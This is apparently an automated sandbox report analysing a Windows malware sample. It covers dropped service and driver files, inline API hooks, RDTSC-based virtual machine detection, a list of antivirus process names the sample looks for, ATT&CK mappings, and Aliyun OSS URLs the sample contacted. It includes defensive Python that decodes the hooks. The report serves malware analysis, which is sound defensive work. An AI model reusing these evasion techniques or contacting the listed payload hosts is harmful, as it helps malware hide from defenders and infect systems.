Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_0000000140001430 GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\i[1].dat
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Users\user\Documents\O8xg2t.exe | Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: 287438657364-7643738421.08.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 287438657364-7643738421.08.exe | Virustotal: Detection: 11%
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | File read: C:\Users\user\Desktop\287438657364-7643738421.08.exe
Source: unknown | Process created: C:\Users\user\Desktop\287438657364-7643738421.08.exe "C:\Users\user\Desktop\287438657364-7643738421.08.exe"
Source: unknown | Process created: C:\Users\user\Documents\O8xg2t.exe C:\Users\user\Documents\O8xg2t.exe
Source: unknown | Process created: C:\Users\user\Documents\O8xg2t.exe C:\Users\user\Documents\O8xg2t.exe
Source: unknown | Process created: C:\Users\user\Documents\O8xg2t.exe C:\Users\user\Documents\O8xg2t.exe
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: pid.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: hid.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: msv1_0.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: ntlmshared.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Section loaded: cryptdll.dll
Source: C:\Users\user\Documents\O8xg2t.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Documents\O8xg2t.exe | Section loaded: vselog.dll
Source: C:\Users\user\Documents\O8xg2t.exe | Section loaded: wininet.dll
Source: C:\Users\user\Documents\O8xg2t.exe | Section loaded: vselog.dll
Source: C:\Users\user\Documents\O8xg2t.exe | Section loaded: wininet.dll
Source: C:\Users\user\Documents\O8xg2t.exe | Section loaded: vselog.dll
Source: C:\Users\user\Documents\O8xg2t.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: 287438657364-7643738421.08.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: 287438657364-7643738421.08.exe | Static file information: File size 30886912 > 1048576
Source: 287438657364-7643738421.08.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58c00
Source: 287438657364-7643738421.08.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: F:\Development\GS-DES\DES10.0\HKPROC\bin\x64\UnicodeRelease\HkApp.x64.pdb source: 287438657364-7643738421.08.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe, 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000006.00000000.2411129760.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000007.00000002.2431285508.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000007.00000000.2425791156.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000009.00000000.2540851216.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe.0.dr
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | File created: C:\Users\user\Documents\O8xg2t.exe (dropped PE file)
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | File created: C:\Users\user\Documents\vselog.dll (dropped PE file)
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | File created: C:\Windows\System32\drivers\189atohci.sys (dropped PE file)
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Documents\O8xg2t.exe | Memory written: PID: 3396 base: 7FFBCB910008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\O8xg2t.exe | Memory written: PID: 3396 base: 7FFBCB7AD9F0 value: E9 20 26 16 00
Source: C:\Users\user\Documents\O8xg2t.exe | Memory written: PID: 6880 base: 7FFBCB910008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\O8xg2t.exe | Memory written: PID: 6880 base: 7FFBCB7AD9F0 value: E9 20 26 16 00
Source: C:\Users\user\Documents\O8xg2t.exe | Memory written: PID: 6504 base: 7FFBCB910008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\O8xg2t.exe | Memory written: PID: 6504 base: 7FFBCB7AD9F0 value: E9 20 26 16 00
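The "Memory written" rows record the same two 5-byte writes in each of the three processes, and the leading byte E9 makes each of them a JMP rel32. Decoding the displacement turns the raw bytes into something an analyst can act on: the two jumps land just past each other's write sites, which is the shape of an inline hook paired with a stolen-bytes trampoline. The Python below is an added example, not code from the report or from the sample, that performs this decoding. The target arithmetic is exact x86-64 semantics; deciding which of the two writes is the hook and which is the trampoline is a heuristic, marked as an assumption in the code, and is not something the report states.

```python
import struct

# Constructed from the "Memory written" entries above: the same two 5-byte
# writes were observed in PIDs 3396, 6880 and 6504. base = address written to.
WRITES = [
    (0x7FFBCB910008, bytes.fromhex("E9EBD9E9FF")),
    (0x7FFBCB7AD9F0, bytes.fromhex("E920261600")),
]

MASK64 = (1 << 64) - 1


def decode_jmp_rel32(base, data):
    """Target of an E9 rel32 (JMP near, 5 bytes) written at base, or None.

    x86-64 semantics: target = address of the next instruction (base + 5)
    plus the sign-extended 32-bit displacement."""
    if len(data) < 5 or data[0] != 0xE9:
        return None
    (rel,) = struct.unpack("<i", data[1:5])
    return (base + 5 + rel) & MASK64


def mutual_pairs(writes, max_skip=16):
    """Find pairs of patches where B's jump lands a few bytes past A's site,
    i.e. B looks like the 'jump back' of a trampoline that carries the bytes
    A's patch destroyed. Both orientations are returned; pick_orientation
    decides which one is the hook and which one the trampoline."""
    targets = {base: decode_jmp_rel32(base, data) for base, data in writes}
    pairs = []
    for a, ta in targets.items():
        for b, tb in targets.items():
            if a == b or ta is None or tb is None:
                continue
            skip = tb - a
            if 0 < skip <= max_skip:
                pairs.append({
                    "hooked_site": a,          # where the detour JMP was written
                    "detour_target": ta,       # where execution is diverted to
                    "trampoline_jmp": b,       # the JMP back into original code
                    "resume_at": tb,           # original code continues here
                    "stolen_bytes": skip,      # bytes relocated into the trampoline
                    "block_start": b - skip,   # trampoline = stolen bytes, then JMP back
                })
    return pairs


def pick_orientation(pairs, block_size=0x1000):
    """Heuristic (assumption): in a real detour the stolen bytes sit at the
    start of an attacker-allocated block, so block_start is aligned, and the
    detour target lives in that same block. Score both properties and return
    the orientation with the higher score."""
    def score(p):
        s = 0
        if p["block_start"] % 16 == 0:
            s += 1
        if p["block_start"] <= p["detour_target"] < p["block_start"] + block_size:
            s += 1
        return s
    return max(pairs, key=score) if pairs else None


def describe(writes):
    """One-line summary of the most plausible hook/trampoline reading."""
    p = pick_orientation(mutual_pairs(writes))
    if p is None:
        return "no trampoline pair found"
    return ("hook at {hooked_site:#x} -> handler {detour_target:#x}; trampoline block "
            "{block_start:#x} holds {stolen_bytes} stolen bytes, JMP at "
            "{trampoline_jmp:#x} resumes at {resume_at:#x}").format(**p)
```

Decoded, the write at 0x7FFBCB7AD9F0 jumps to 0x7FFBCB910015 and the write at 0x7FFBCB910008 jumps to 0x7FFBCB7AD9F8, eight bytes past the first site. The consistent reading is that 0x7FFBCB7AD9F0 is the hooked function entry, eight bytes of its prologue were copied to 0x7FFBCB910000 followed by the JMP back, and the hook handler sits at 0x7FFBCB910015 in the same block. The addresses are identical in PIDs 3396, 6880 and 6504, as expected when the same DLL image is mapped at its per-boot base in every process; the report does not name the module, so which export is hooked has to be resolved against the memory dump.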

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | RDTSC instruction interceptor: First address: 1400010C8 second address: 1400010DF instructions: 0x00000000 rdtsc; 0x00000002 dec eax; 0x00000003 shl edx, 20h; 0x00000006 dec eax; 0x00000007 or eax, edx; 0x00000009 dec eax; 0x0000000a mov ecx, eax; 0x0000000c nop; 0x0000000d nop; 0x0000000e dec eax; 0x0000000f xor edx, edx; 0x00000011 push ebx; 0x00000012 pop ebx; 0x00000013 fldpi; 0x00000015 frndint; 0x00000017 rdtsc
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | RDTSC instruction interceptor: First address: 1400010DF second address: 1400010DF instructions: 0x00000000 rdtsc; 0x00000002 dec eax; 0x00000003 shl edx, 20h; 0x00000006 dec eax; 0x00000007 xor ebx, ebx; 0x00000009 dec eax; 0x0000000a mov ebx, edx; 0x0000000c dec eax; 0x0000000d or eax, ebx; 0x0000000f dec eax; 0x00000010 sub eax, ecx; 0x00000012 nop; 0x00000013 dec ebp; 0x00000014 xor edx, edx; 0x00000016 dec esp; 0x00000017 mov edx, eax; 0x00000019 dec ebp; 0x0000001a cmp edx, eax; 0x0000001c jc 00007F904516E930h; 0x0000001e fldpi; 0x00000020 frndint; 0x00000022 rdtsc
Note on the two listings: the sample is a 64-bit PE (image base 0x140000000) but the bytes were decoded as 32-bit code, so every "dec eax", "dec ebp" and "dec esp" is really a REX prefix (0x48, 0x4D, 0x4C) belonging to the following 64-bit instruction; the actual sequence is rdtsc / shl rdx, 20h / or rax, rdx / mov rcx, rax ... rdtsc / shl rdx, 20h / or rax, rbx / sub rax, rcx, i.e. two RDTSC reads around a fixed x87 workload (fldpi; frndint) with the 64-bit difference compared against a threshold (cmp / jc). A hypervisor that traps or offsets RDTSC inflates that difference, which is what the check keys on.
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Window / User API: threadDelayed 548
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Window / User API: threadDelayed 451
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys
Source: C:\Users\user\Documents\O8xg2t.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess | graph_6-14031
Source: C:\Users\user\Documents\O8xg2t.exe | API coverage: 2.7 %
Source: C:\Users\user\Documents\O8xg2t.exe | API coverage: 2.7 %
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | TID: 7672 | Thread sleep count: 548 > 30
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | TID: 7672 | Thread sleep time: -274000s >= -30000s
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | TID: 7672 | Thread sleep count: 451 > 30
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | TID: 7672 | Thread sleep time: -225500s >= -30000s
Source: C:\Users\user\Documents\O8xg2t.exe | Last function: Thread delayed
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00007FFBC320A1B8 FindFirstFileExW
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00007FFBC1BAA1B8 FindFirstFileExW
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004EC000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004EA000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Documents\O8xg2t.exe | API call chain: ExitProcess graph end node | graph_6-14032
Source: C:\Users\user\Documents\O8xg2t.exe | API call chain: ExitProcess graph end node | graph_6-14374
Source: C:\Users\user\Documents\O8xg2t.exe | API call chain: ExitProcess graph end node | graph_9-14440
Source: C:\Users\user\Documents\O8xg2t.exe | API call chain: ExitProcess graph end node | graph_9-14096
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00000001400073E0 LdrLoadDll
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00000001400092E0 SetUnhandledExceptionFilter
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00007FFBC32076E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00007FFBC3201F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00007FFBC3202630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00000001400092E0 SetUnhandledExceptionFilter
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00007FFBC1BA2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00007FFBC1BA1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00007FFBC1BA76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00007FFBC1BA76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FFBC1BA76E0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Documents\O8xg2t.exe | NtProtectVirtualMemory: Indirect: 0x2B4B253
Source: C:\Users\user\Documents\O8xg2t.exe | NtAllocateVirtualMemory: Indirect: 0x140006FD0
Source: C:\Users\user\Documents\O8xg2t.exe | NtProtectVirtualMemory: Indirect: 0x2A1B253
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | NtDelayExecution: Indirect: 0x1D94D5
Source: C:\Users\user\Documents\O8xg2t.exe | NtProtectVirtualMemory: Indirect: 0x299B253
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00007FFBC320FD40 cpuid
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_000000014000F370 GetLocaleInfoA
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_000000014000F370 GetLocaleInfoA
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmp | Binary or memory strings (AV process names):
  • kxetray.exe
  • vsserv.exe
  • avcenter.exe
  • KSafeTray.exe
  • avp.exe
  • 360Safe.exe
  • 360tray.exe
  • rtvscan.exe
  • ashDisp.exe
  • TMBMSRV.exe
  • avgwdsvc.exe
  • AYAgent.aye
  • QUHLPSVC.EXE
  • RavMonD.exe
  • MsMpEng.exe
  • K7TSecurity.exe
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer
MITRE ATT&CK matrix: techniques flagged for this sample, with the count the matrix shows beside each. The matrix's unflagged template cells and the tactics with no flagged technique (Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact) are omitted.

Execution: Service Execution (12), Native API (2)
Persistence: Windows Service (24), DLL Side-Loading (1)
Privilege Escalation: Windows Service (24), Access Token Manipulation (1), Process Injection (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1)
Defense Evasion: Masquerading (31), Obfuscated Files or Information (2), Virtualization/Sandbox Evasion (1), Access Token Manipulation (1), Process Injection (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1)
Credential Access: Credential API Hooking (1)
Discovery: Security Software Discovery (131), System Information Discovery (123), System Time Discovery (1), Virtualization/Sandbox Evasion (1), Process Discovery (1), Application Window Discovery (1), File and Directory Discovery (1)
Collection: Credential API Hooking (1), Archive Collected Data (1)
Command and Control: Encrypted Channel (11), Application Layer Protocol (3), Non-Application Layer Protocol (2), Ingress Tool Transfer (1)
Source | Detection | Scanner
287438657364-7643738421.08.exe | 11% | Virustotal
287438657364-7643738421.08.exe | 8% | ReversingLabs
C:\Users\user\Documents\O8xg2t.exe | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
URL | Detection | Scanner | Label
https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif6 | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/q | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gif | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/i.dat | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/s.jpg | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/i.datta | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifk | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/Zm | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/w | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/s.dat | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifW | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/ | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/Vm | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gif | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/ | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifta | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifents | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.giff | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifhttps://jylhok.oss-cn-beijing.aliyuncs.com/b.gifhttp | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/7-2476756634-1003 | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifws | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/d.gif | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/C | 0% | Avira URL Cloud | safe
https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif | 0% | Avira URL Cloud | safe
Domains:
Name: sc-2a1c.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | IP: 39.103.20.48 | Active: true | Malicious: false | Reputation: unknown
Name: jylhok.oss-cn-beijing.aliyuncs.com | IP: unknown | Active: unknown | Malicious: false | Reputation: unknown
Contacted URLs:
https://jylhok.oss-cn-beijing.aliyuncs.com/s.dat | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/i.dat | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/s.jpg | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gif | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gif | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/d.gif | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
URLs found in memory or dropped files, with the regions they were recovered from:
https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif6 | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/q | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/i.datta | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifk | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
